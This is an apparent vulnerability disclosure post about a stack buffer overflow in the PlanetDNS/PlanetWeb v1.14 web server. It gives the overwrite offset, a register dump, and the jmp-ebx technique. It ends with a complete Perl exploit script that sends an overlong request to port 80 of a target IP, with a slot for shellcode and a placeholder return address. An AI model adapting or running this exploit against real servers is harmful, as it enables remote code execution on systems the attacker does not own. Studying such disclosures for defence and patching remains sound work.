hi
planetdns ( http://www.planetdns.net)is
commercial software package that allows to
turn computer into an Internet server.
and be able to create an Internet Name, connect to
a web server, FTP, mail server, etc. running
on computer.
planetdns is vulnerable has a buffer overflow with a
overwrite of eip (never posted before )... one already
notified that a number of 1024 byte could crasher the
server, and I found that while sending (without GET/)un of
6500 byte could thus make a overwrite eip of execution of a
shellcode, the overwrite is done with byte 6449, 50, 51,
52.
one notices of aillor that ebx and always 4byte before the
eip the ret address will be thus a jmp ebx or call ebx that
one finds in many modules charged .
I realised an exploit tested on plaetweb v1.14 and who
gives L state of the following registers:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5
esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up
ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000246
43434343 ?? ???
exploit code:


#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
#

use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!! \n\n";
 exit;
}

$shellcode = ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
#add your favorit shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";